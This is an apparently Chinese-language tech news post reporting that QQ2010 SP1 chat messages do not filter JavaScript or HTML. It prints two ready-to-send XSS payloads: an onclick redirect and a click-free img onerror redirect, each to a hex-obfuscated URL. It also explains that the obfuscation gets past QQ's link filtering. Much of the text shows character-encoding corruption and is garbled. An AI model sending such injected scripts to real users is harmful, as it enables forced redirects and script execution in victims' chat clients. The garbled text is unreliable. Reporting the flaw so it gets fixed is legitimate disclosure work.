騰訊QQ一向是騰訊主打的產(chǎn)品,意想不到前天發(fā)布的QQ2010SP1竟然有如此大漏洞。用戶可以隨意在消息中使用Javascript、Html,騰訊并沒有對此進(jìn)行有效的屏蔽,如此低級漏洞,在QQ這樣的軟件中出現(xiàn)實屬罕見。
截止發(fā)稿之日起,騰訊還沒有對此漏洞給出解決辦法,網(wǎng)友只有去下載試用QQ2010正式版來避免此問題。
點擊下載:QQ2010SP1正式版
首先囧一下:腳本出錯還會提示錯誤
1、消息記錄的Javascript、Html標(biāo)簽沒有屏蔽
2、消息盒子Javascript、Html標(biāo)簽沒有屏蔽
3、小實驗
1、發(fā)送代碼:<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />
因為騰訊會自動將url轉(zhuǎn)換,我們必須混淆url才能發(fā)送
4、超牛代碼
<img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>
因為要點擊才能觸發(fā),想到一個不用點擊就能觸發(fā)的代碼。
5、希望騰訊快點修復(fù),這個漏洞非同小可
6、本漏洞由TGL發(fā)現(xiàn)。
關(guān)于騰牛 | 聯(lián)系方式 | 發(fā)展歷程 | 版權(quán)聲明 | 下載幫助(?) | 廣告聯(lián)系 | 網(wǎng)站地圖 | 友情鏈接
Copyright 2005-2018 QQTN.com 【騰牛網(wǎng)】 版權(quán)所有 鄂ICP備17010784號-1 | 鄂公網(wǎng)安備 42011102000245號
聲明: 本站非騰訊QQ官方網(wǎng)站 所有軟件和文章來自互聯(lián)網(wǎng) 如有異議 請與本站聯(lián)系 本站為非贏利性網(wǎng)站 不接受任何贊助和廣告